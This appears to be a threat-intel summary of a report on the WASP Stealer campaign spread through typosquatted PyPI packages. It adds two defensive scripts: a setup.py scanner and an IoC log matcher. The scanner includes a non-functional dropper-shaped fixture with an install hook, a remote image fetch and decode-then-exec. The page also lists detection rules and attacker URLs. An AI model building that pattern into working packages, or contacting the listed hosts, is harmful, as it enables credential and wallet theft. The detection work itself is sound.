WASP Attack on Python — Polymorphic Malware Shipping WASP Stealer; Infecting Hundreds Of Victims

Researchers identify the WASP threat actor behind a Python package campaign that delivers a polymorphic WASP Stealer via PyPI and uses steganography to hide its payload. The malware targets Discord accounts, wallets, and other files, exfiltrating data through a hard-coded Discord webhook while leveraging fake GitHub profiles and typosquatted packages to spread. #WASP #WASPStealer #PyPI #Discord #Steganography #Typosquatting #GitHub

Keypoints

  • WASP is the threat actor behind a PyPI-based supply chain attack, using typosquatting and fake GitHub profiles to distribute WASP Stealer.
  • The campaign employs polymorphic malware that hides its payload via steganography and persists across reboots.
  • The dropper is delivered through Python packaging (setup.py) and installs additional components (e.g., judyb) used for steganography.
  • The attacker fetches a second-stage payload from misogyny[.]wtf, which is gzip-encoded and then decoded and loaded in memory.
  • Persistence is achieved by modifying the Run registry key to survive reboots, enabling silent operation.
  • Data theft targets Discord accounts, passwords, crypto wallets, credit cards, and other files, exfiltrated via a hard-coded Discord webhook.

MITRE Techniques

  • [T1059.006] Python – After installing the package, the setup.py script is executed. ‘After installing the package, the setup.py script is executed.’
  • [T1105] Ingress Tool Transfer – The setup.py script downloads a .png image from this address and saves it in the operating system’s temp directory. ‘Next, the setup.py script downloads a .png image from this address and saves it in the operating system’s temp directory.’
  • [T1027.001] Steganography – The attacker was using steganography to hide code inside packages. ‘using steganography to hide code inside packages’
  • [T1140] Deobfuscate/Decode Files or Information – The juicy code in this stage is gzip encoded, so the first instruction executed is to decode it and load it. ‘The juicy code in this stage is gzip encoded, so the first instruction executed is to decode it and load it.’
  • [T1547.001] Boot or Logon Autostart Execution – The code modifies the registry key ‘HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ so that this Python code will be persistent across reboots. ‘…registry key — HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run’
  • [T1195] Supply Chain Compromise – Typosquatting on PyPI packages. ‘uploaded Typosquatting packages combined with the Starjacking technique (stealing the stars from another project)’
  • [T1036] Masquerading – Fake GitHub profiles to appear legitimate. ‘fake GitHub accounts’ and ‘stealing the profile description from popular user accounts’
  • [T1041] Exfiltration Over C2 Channel – Data is sent to a hard-coded Discord webhook. ‘sends the data back to the attacker’s discord webhook which is hard coded inside’
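The keypoints and the MITRE list above describe the same install-time chain (setup.py hook, image download, steganography library, gzip decode straight into exec, Run key write, hard-coded Discord webhook). The following heuristic triage script is an added example for this page, not Checkmarx's tooling or anything from the original post: it scores a setup.py file against one regex per reported behaviour. The regexes, the two-hit threshold and both fixtures are assumptions made for this example; the "suspicious" fixture only contains the shapes the rules look for and is deliberately not a working dropper.

```python
"""Heuristic triage of a setup.py for the install-time behaviours described
in the WASP write-up. Example code added for this page, not Checkmarx's tooling."""
import re

# One heuristic per reported behaviour. The regexes are assumptions made for
# this example (broad, noisy on purpose); they are not signatures from the report.
RULES = {
    "T1059.006 code runs at install time": re.compile(
        r"from\s+setuptools\.command\.install\s+import\s+install|cmdclass\s*="),
    "T1105 image fetched from remote URL": re.compile(
        r"(urlretrieve|urlopen|requests\.get)\(\s*[\"'][^\"']*\.png[\"']", re.I),
    "T1027.001 steganography library used": re.compile(
        r"\b(judyb|stegano|steganography)\b", re.I),
    "T1547.001 Run key written": re.compile(r"CurrentVersion\\+Run", re.I),
    "T1041 Discord webhook hard-coded": re.compile(
        r"discord(app)?\.com/api/webhooks/", re.I),
}

# Decode-then-exec needs two conditions in the same file, so it is a small function.
EXEC_CALL = re.compile(r"\b(exec|eval)\s*\(")
DECODER = re.compile(r"(gzip|zlib)\.decompress\(|b64decode\(|marshal\.loads\(")


def scan_setup_py(source: str) -> list:
    """Return the (sorted) names of every heuristic that fires on the source text."""
    hits = [name for name, pattern in RULES.items() if pattern.search(source)]
    if EXEC_CALL.search(source) and DECODER.search(source):
        hits.append("T1140 decoded blob passed to exec/eval")
    return sorted(hits)


def verdict(source: str, threshold: int = 2) -> str:
    """A single heuristic is weak evidence; two or more warrant manual review."""
    return "suspicious" if len(scan_setup_py(source)) >= threshold else "clean"


# Constructed fixtures (assumptions for this example).
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="demo-lib", version="1.0.0", packages=find_packages())
'''

# Contains only the textual shapes the rules look for; not a functional dropper.
SUSPICIOUS_SETUP = '''
import gzip, tempfile, urllib.request
from setuptools import setup
from setuptools.command.install import install
import judyb

class Hook(install):
    def run(self):
        path = tempfile.gettempdir() + "/cover.png"
        urllib.request.urlretrieve("https://example.invalid/cover.png", path)
        blob = b""  # placeholder: the report describes a gzip-encoded stage here
        exec(gzip.decompress(blob))
        RUN_KEY = r"Software\\Microsoft\\Windows\\CurrentVersion\\Run"
        WEBHOOK = "https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER"
        install.run(self)

setup(name="demo-lib", version="1.0.0", cmdclass={"install": Hook})
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(label, verdict(src), scan_setup_py(src))
```

Run it over every setup.py in a package's sdist before it is allowed into an internal mirror; a single hit (for example a legitimate custom install command) is common, which is why the verdict requires two independent heuristics before it flags a package for review.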

Indicators of Compromise

  • [URL] – hxxps://i.imgur[.]com/aRl53RS.png, hxxps://i.imgur[.]com/xbQ1J4D.png
  • [Domain] – misogyny[.]wtf
  • [URL] – hxxp://misogyny[.]wtf/inject/UsRjS959Rqm4sPG4
  • [URL] – hxxp://misogyny[.]wtf:8080/, hxxp://misogyny[.]wtf:2020/copy
  • [URL] – hxxp://misogyny[.]wtf/grab/UsRjS959Rqm4sPG4
  • [URL] – hxxp://misogyny[.]wtf:2020/parser
  • [URL] – hxxps://cdn[.]discordapp[.]com/attachments/1039182045575925784/1039513531667726336/UPDATE.exe, hxxps://cdn[.]discordapp[.]com/attachments/1039182045575925784/1039513532061978685/FEED.exe
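The indicators above are published defanged and mix attacker-controlled infrastructure (misogyny[.]wtf) with shared services (Imgur, the Discord CDN) where only the exact URL is meaningful. The script below is an added example for this page, not part of the original post: it refangs the list, splits it into an exact-URL set and a host set, and matches both against proxy log lines. The log line format, the shared-host list and the sample log are assumptions constructed for the example.

```python
"""Match the write-up's defanged IoCs against proxy log lines. Example code
added for this page; the log format and the shared-host list are assumptions."""
from urllib.parse import urlsplit

# IoCs exactly as published (defanged) in the write-up.
DEFANGED_IOCS = [
    "hxxps://i.imgur[.]com/aRl53RS.png",
    "hxxps://i.imgur[.]com/xbQ1J4D.png",
    "misogyny[.]wtf",
    "hxxp://misogyny[.]wtf/inject/UsRjS959Rqm4sPG4",
    "hxxp://misogyny[.]wtf/grab/UsRjS959Rqm4sPG4",
    "hxxp://misogyny[.]wtf:8080/",
    "hxxp://misogyny[.]wtf:2020/copy",
    "hxxp://misogyny[.]wtf:2020/parser",
    "hxxps://cdn[.]discordapp[.]com/attachments/1039182045575925784/1039513531667726336/UPDATE.exe",
    "hxxps://cdn[.]discordapp[.]com/attachments/1039182045575925784/1039513532061978685/FEED.exe",
]

# Legitimate shared services: a hit on the host alone is not evidence, only the
# exact attacker-controlled URL is. (Assumption made for this example.)
SHARED_HOSTS = {"i.imgur.com", "cdn.discordapp.com"}


def refang(ioc: str) -> str:
    """Undo the usual defanging so the value can be compared with live data."""
    return ioc.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


def load_iocs(defanged):
    """Split IoCs into an exact-URL set and a lower-cased host set."""
    urls, hosts = set(), set()
    for ioc in defanged:
        clean = refang(ioc)
        if "://" in clean:
            urls.add(clean)
            hosts.add(urlsplit(clean).hostname)
        else:
            hosts.add(clean.lower())
    return urls, hosts


def match_log(log_text: str, iocs=DEFANGED_IOCS):
    """Return (line number, url, match kind) for every log line that hits an IoC.

    Assumed line format: '<epoch> <client ip> <method> <url> <status>'.
    Exact URL matches are reported first; host matches are suppressed for
    shared services to avoid flagging every Imgur or Discord CDN request.
    """
    urls, hosts = load_iocs(iocs)
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 5:
            continue
        url = fields[3]
        host = urlsplit(url).hostname
        if url in urls:
            hits.append((n, url, "url"))
        elif host in hosts and host not in SHARED_HOSTS:
            hits.append((n, url, "host"))
    return hits


# Constructed log sample: lines 1, 2 and 5 should hit, 3 and 4 should not.
SAMPLE_LOG = """\
1700000000.001 10.0.0.5 GET http://misogyny.wtf:2020/parser 200
1700000000.002 10.0.0.5 GET https://i.imgur.com/aRl53RS.png 200
1700000000.003 10.0.0.6 GET https://i.imgur.com/unrelated.png 200
1700000000.004 10.0.0.7 GET https://pypi.org/simple/requests/ 200
1700000000.005 10.0.0.8 GET http://misogyny.wtf/grab/other 404
"""

if __name__ == "__main__":
    for hit in match_log(SAMPLE_LOG):
        print(hit)
```

Line 5 is the case worth noticing: the path differs from any published URL, but the host is attacker-controlled, so it is still reported (as a host match), while the unrelated Imgur request on line 3 is not.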

Read more: https://medium.com/checkmarx-security/wasp-attack-on-python-polymorphic-malware-shipping-wasp-stealer-infecting-hundreds-of-victims-10e92439d192